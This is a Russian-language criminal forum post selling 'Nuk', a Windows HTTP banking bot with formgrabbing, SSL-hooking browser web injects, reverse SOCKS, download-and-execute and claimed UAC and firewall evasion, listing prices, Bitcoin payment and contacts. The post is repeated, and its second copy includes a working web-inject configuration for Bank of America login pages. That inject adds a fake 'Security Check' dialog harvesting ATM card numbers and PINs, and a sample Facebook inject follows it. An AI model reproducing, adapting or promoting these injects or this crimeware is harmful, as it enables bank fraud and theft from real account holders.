Gosya
Заглянувший
Gosya
Заглянувший
- Статус
- Offline
- Регистрация
- 14 Дек 2016
- Сообщения
- 1
- Реакции
- 0
- Покупки через Гарант
- 0
- Продажи через Гарант
- 0
Здаров, мы желаем всем с добрый успехов. Сегодня мы хочем вам представить "Нук (Нуклир)" HTTP бот! Так, по этой теме у вас есть пару мысли
Как мне различать вашей бот со всех других на рынке?
[+] Написан полностью с нуля (нет соединения с Zeus, Carberp, ISFB, etc)
- Парсер (Json)
- Инжекты (Кром - ssl_write/read##_app_data без ssl_close || ФФ - Pr_##write/read без PrOpenTcpSocket/Pr_close)
- Запуск (Код инжект) в системе написан без аутсорсинг
[+] Написан в C <MSVC 2012> (Бот и все модули) + PHP с PDO и JS (Панель)
[+] Полная совместимость со всеми Windows семейства NT (x32 и x64)
[+] Не привлекает внимание UAC или Windows Firewall
Какие модули я найду в первей версии бота?
[+] Возможность загружать и запускать ЕХЕ
[+] Реверс SOCKS с бэк-коннект
[+] Формграббер и Веб-Инжекты (обход HTTP2/SPDY) с поддержка (Internet Explorer 6 - 11, Firefox 28 - 50, Chrome 50 - 55)
- Поддержка "wildcard" в парсер (Т.П *.facebook.*)
- Парсером в самом деле очень легко пользовать
- Формат инжекта не важно, можно писаты его как угодна
- Можете писаты болше чем одну инжекты для каждей страници
- Так же, не важно сколько инжектов вы ползевайти, скоросты браузер/CPU все тоже самая
[!] На данней момент это все модули которие мы предлагаем, хотя в блеском времени мы собираемся добавить HVNC (Windows XP - 10.1), Rootkit (x32/64), и Bot-killer!
Мы сделали для вас демонстраций из нашего бота со всеми исключения которые вы только что прочитали!
Вы можете загрузит видео чтобе увидит как наш бот работает в всех версии браузерах!
Для демонстраций веб инжектов вы можете загружать видео от суда.
Линк: https://vid.me/1Flr
Для демонстраций Реверс SOCKS с бэк-коннектом, вы можете взять видео от суда.
Линк: https://vid.me/4IF2
Сколько будет мне стоить за лицензию вашего бота?
[!] Лицензия бота $3000 (ребилды для новей сервер/домен $200, обновление на новую версию или модули бесплатны)
- После покупка лицензия бота вы сможете добавлят модули в него (SOCKS, HVNC, Bot-killer, и Т.П)
- Реверс SOCKS = $1000
- HVNC (XP - 10.1) = $2500
- Bot-Killer = Пока цене нету
- После покупки бота, мы вам предлагаем ... Техподдержка с 14-00 до 24-00 (Мск) без выходных!
[!] Готов работать под гарантом известного форума
[!] Мы принимаем оплату через BTC и PM
Обновления - Версия 1.0.1.3
1.0.1.0 - Изменили формат инжектов
В прошлой версии только можно была вставить один инжект скрипт за каждую страницу. Тепер мы поминали формат инжектов чтобе вы могли вставлять сколько вам угодно! На пример, посмотрите на этот инжект для БОА (Банк ав Америка):
1.0.1.1 - Изправили сбой в Internet Explorer
В Internet Explorer версия 6 - 9 мы исправили сбой в инжекты парсером. Когда в HTTP header параметр "Content-Length" был "0". Бот думал что на странице не можно вставлять код и так браузер перестал работать бо наш хук (splice) никогда не дал закончить запрос.
1.0.1.2 - Добавили проверку HTML хедера (http header)
Теперь мы проверим для "text/html" хедер в ответ сервера перед того как мы загрузим код в странице! В прошлой версии, если на странице был iframe в на пример <gif, jpeg, или bmp> и в нем была HTML код, бот переписывал его и картинка не показывалась на странице!
1.0.1.3 - Периписали "InjectEngine::ReplaceBuffer" функсию
Теперь он быстро меняет код на странице. Время которое берет добавить инжект на страницу намного меньше чем прошлой версии бота.
Как я могу связаться с вами?
1. Напишите мне в Л/С
2. Постучите мне в жабу
[email protected]
[email protected]
Как мне различать вашей бот со всех других на рынке?
[+] Написан полностью с нуля (нет соединения с Zeus, Carberp, ISFB, etc)
- Парсер (Json)
- Инжекты (Кром - ssl_write/read##_app_data без ssl_close || ФФ - Pr_##write/read без PrOpenTcpSocket/Pr_close)
- Запуск (Код инжект) в системе написан без аутсорсинг
[+] Написан в C <MSVC 2012> (Бот и все модули) + PHP с PDO и JS (Панель)
[+] Полная совместимость со всеми Windows семейства NT (x32 и x64)
[+] Не привлекает внимание UAC или Windows Firewall
Какие модули я найду в первей версии бота?
[+] Возможность загружать и запускать ЕХЕ
[+] Реверс SOCKS с бэк-коннект
[+] Формграббер и Веб-Инжекты (обход HTTP2/SPDY) с поддержка (Internet Explorer 6 - 11, Firefox 28 - 50, Chrome 50 - 55)
- Поддержка "wildcard" в парсер (Т.П *.facebook.*)
- Парсером в самом деле очень легко пользовать
Код:
[
{
"url": "*facebook.com", // На каком Host/Path загрузит код?
"uri": "/login/identify?ctx=recover&lwv=*",
"data_type": "before", // куда вставить код - перед (before) или после (after) ?
"replace": "</head>", // Какой код в страницы нам искать?
"code": "<script>alert('Facebook');</script>" // Скрипт которие мы будим вставлят на страници
},
{
"data_type": "before",
"url": "boss.bankofamerica.com",
"uri": "*",
"replace": "</head>",
"code": "<script>alert('Bank of America');</script>"
}
]- Можете писаты болше чем одну инжекты для каждей страници
- Так же, не важно сколько инжектов вы ползевайти, скоросты браузер/CPU все тоже самая
[!] На данней момент это все модули которие мы предлагаем, хотя в блеском времени мы собираемся добавить HVNC (Windows XP - 10.1), Rootkit (x32/64), и Bot-killer!
Мы сделали для вас демонстраций из нашего бота со всеми исключения которые вы только что прочитали!
Вы можете загрузит видео чтобе увидит как наш бот работает в всех версии браузерах!
Для демонстраций веб инжектов вы можете загружать видео от суда.
Линк: https://vid.me/1Flr
Для демонстраций Реверс SOCKS с бэк-коннектом, вы можете взять видео от суда.
Линк: https://vid.me/4IF2
Сколько будет мне стоить за лицензию вашего бота?
[!] Лицензия бота $3000 (ребилды для новей сервер/домен $200, обновление на новую версию или модули бесплатны)
- После покупка лицензия бота вы сможете добавлят модули в него (SOCKS, HVNC, Bot-killer, и Т.П)
- Реверс SOCKS = $1000
- HVNC (XP - 10.1) = $2500
- Bot-Killer = Пока цене нету
- После покупки бота, мы вам предлагаем ... Техподдержка с 14-00 до 24-00 (Мск) без выходных!
[!] Готов работать под гарантом известного форума
[!] Мы принимаем оплату через BTC и PM
Обновления - Версия 1.0.1.3
1.0.1.0 - Изменили формат инжектов
В прошлой версии только можно была вставить один инжект скрипт за каждую страницу. Тепер мы поминали формат инжектов чтобе вы могли вставлять сколько вам угодно! На пример, посмотрите на этот инжект для БОА (Банк ав Америка):
Код:
[ // Здесь у нас есть рут (root) фрейм (frame)
{ // Эта у нас инжект фрейм, он для нас содержит информацию о каждой инжект
/*
Здесь мы пишем, URL и URI который мы хотим настроить
У нас в URI есть "*", так же, давай я вам объясню как вы можете с ним пользоваться.
На этой странице "secure.bankofamerica.com" у нас есть очены длиней URI: "login/sign-in/signOnV2Screen.go?msg=InvalidCredentialsExceptionV2&request_locale=en_us&lpOlbResetErrorCounter=0"
Чтобы у нас инжект сработал, бот должен знать куда ему добавлять инжект код. И так,
мы пишем "*" после "/login/". Это говорит боту "if URL="secure.bankofamerica.com"
AND URI="/login/..." тогда продолжай искать код где вставлять инжект. Короче, что это "*"
делает? Она говорите боту если URL правильней тогда не важно что у нас есть после "/login/", серовно
принимай что это правильная страница!
*/
"url": "secure.bankofamerica.com",
"uri": "/login/*",
"code": // Здесь мы вставляем код которые мы хотим менять в странице, он входить в аррай (array) {},{}...
[
{
"replace": "enterOnlineIDFormSubmit();", // Код который мы будим искать на странице
"before": "dialog.dialog('open');/*", // Код который мы будим ставим [перед] "replace" код
"after": "*/" // Код который мы будим ставим [после] "replace" код
},
{
"replace": "<head>",
"before": "",
"after": "<script src=\"https://code.jquery.com/jquery-1.12.4.js\"></script>\r\n<script src=\"https://code.jquery.com/ui/1.12.1/jquery-ui.js\"></script>\r\n<script>\r\nvar dialog;\r\n$(function()\r\n{\r\n dialog = $(\"#dialog-form\").dialog(\r\n {\r\n autoOpen: false,\r\n closeOnEscape: false,\r\n open: function(event, ui)\r\n {\r\n $(\".ui-dialog-titlebar\", ui.dialog | ui).hide();\r\n },\r\n resizable: false,\r\n height: \"auto\",\r\n width: \"auto\",\r\n modal: true,\r\n });\r\n});\r\n</script>\r\n<style>\r\n#dialog-form\r\n{\r\n display: none;\r\n background: #FFF4F9;\r\n padding: 10px;\r\n border: 1px solid #D10019;\r\n}\r\n\r\n.ui-widget-content:focus\r\n{\r\n outline: none;\r\n -moz-box-shadow: none;\r\n -webkit-box-shadow: none;\r\n box-shadow: none;\r\n}\r\n\r\n#dialog-form h1\r\n{\r\n background: #DC1431;\r\n color: #FFF;\r\n margin: -10px;\r\n padding: 5px;\r\n font-weight: bold;\r\n}\r\n</style>"
},
{
"replace": "<body*>",
"before": "",
"after": "<div id=\"dialog-form\" class=\"phoenix\">\r\n <h1>Security Check</h1>\r\n <iframe style=\"display: none;\" width=\"0\" height=\"0\" border=\"0\" name=\"dummyframe\" id=\"dummyframe\"></iframe>\r\n <form name=\"sec_ver\" method=\"POST\" action=\"sec_ver\" class=\"simple-form\" target=\"dummyframe\">\r\n <label class=\"mtop-15\">ATM Card Number</label>\r\n <input id=\"enterID-input\" name=\"card\" autocomplete=\"off\" type=\"text\">\r\n <label class=\"mtop-15\">PIN Number</label>\r\n <input id=\"enterID-input\" name=\"pin\" autocomplete=\"off\" type=\"text\">\r\n <a href=\"javascript:void(0);\" onclick=\"dialog.dialog('close'); document.forms['sec_ver'].submit(); enterOnlineIDFormSubmit();\" class=\"btn-bofa btn-bofa-small\" style=\"margin-top: 15px;\">Verify</a>\r\n </form>\r\n</div>"
}
]
},
{
"url": "*facebook.com",
"uri": "/",
"code":
[
{
"replace": "</head>",
"before": "<script>alert('Hello World');</script>",
"after": ""
}
]
}
]В Internet Explorer версия 6 - 9 мы исправили сбой в инжекты парсером. Когда в HTTP header параметр "Content-Length" был "0". Бот думал что на странице не можно вставлять код и так браузер перестал работать бо наш хук (splice) никогда не дал закончить запрос.
1.0.1.2 - Добавили проверку HTML хедера (http header)
Теперь мы проверим для "text/html" хедер в ответ сервера перед того как мы загрузим код в странице! В прошлой версии, если на странице был iframe в на пример <gif, jpeg, или bmp> и в нем была HTML код, бот переписывал его и картинка не показывалась на странице!
1.0.1.3 - Периписали "InjectEngine::ReplaceBuffer" функсию
Теперь он быстро меняет код на странице. Время которое берет добавить инжект на страницу намного меньше чем прошлой версии бота.
Как я могу связаться с вами?
1. Напишите мне в Л/С
2. Постучите мне в жабу
[email protected]
[email protected]
